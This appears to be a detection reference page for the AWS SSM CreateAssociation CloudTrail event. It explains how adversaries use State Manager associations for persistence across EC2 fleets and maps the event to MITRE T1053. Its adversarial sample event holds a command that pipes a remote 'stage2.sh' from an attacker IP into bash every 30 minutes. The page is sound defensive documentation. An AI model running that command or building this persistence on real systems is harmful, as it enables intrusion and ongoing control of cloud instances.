Skip to content

CreateAssociation

AWS

CreateAssociation

service: AWS - SSM
tactics:
techniques:

Event

Creates an SSM State Manager association, binding a document to instances for persistent or scheduled command execution.

Security Context

  • SSM associations execute documents on a schedule or on instance state changes, providing a durable persistence mechanism that survives instance reboots and re-deployments.
  • Adversaries abuse State Manager associations to maintain command execution across fleets of instances without needing direct network access.

Log Source

CloudTrail

Sample Event

Adversarial. Draco creates an SSM State Manager association that runs the AWS-RunShellScript document on every OCCAMY pipeline EC2 instance every 30 minutes. The script payload (passed via Parameters.commands) calls back to the adversary VPS to fetch and execute follow-on stages. Because the association uses targets with the tag:fantasticlogs/component=occamy-pipeline selector, the persistence persists across instance replacements as long as the tagging convention holds. SSM commands run with the instance’s IAM role — typically substantially more permissive than Draco’s own user.

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "AKIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T21:48:33Z",
"eventSource": "ssm.amazonaws.com",
"eventName": "CreateAssociation",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"name": "AWS-RunShellScript",
"associationName": "occamy-health-check",
"targets": [
{
"key": "tag:fantasticlogs/component",
"values": ["occamy-pipeline"]
}
],
"parameters": {
"commands": [
"curl -fsSL http://203.0.113.77/stage2.sh | bash"
],
"executionTimeout": ["3600"]
},
"scheduleExpression": "rate(30 minutes)",
"applyOnlyAtCronInterval": false
},
"responseElements": {
"associationDescription": {
"associationId": "66666666-6666-6666-6666-001010011010",
"associationVersion": "1",
"name": "AWS-RunShellScript",
"associationName": "occamy-health-check",
"documentVersion": "$DEFAULT",
"date": "Apr 15, 2026, 9:48:33 PM",
"lastUpdateAssociationDate": "Apr 15, 2026, 9:48:33 PM",
"scheduleExpression": "rate(30 minutes)",
"applyOnlyAtCronInterval": false,
"targets": [
{
"key": "tag:fantasticlogs/component",
"values": ["occamy-pipeline"]
}
],
"overview": {
"detailedStatus": "Creating",
"status": "Pending"
},
"status": {
"name": "Associated",
"date": "Apr 15, 2026, 9:48:33 PM",
"message": "Associated with AWS-RunShellScript"
}
}
},
"requestID": "90000000-0000-4000-8000-000010000000",
"eventID": "90000000-0000-4000-8000-000010000001",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "ssm.us-east-1.amazonaws.com"
}
}

MITRE ATT&CK Mapping

Tactics: Persistence

Techniques:
  • T1053 — Scheduled Task/Job — Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, prov...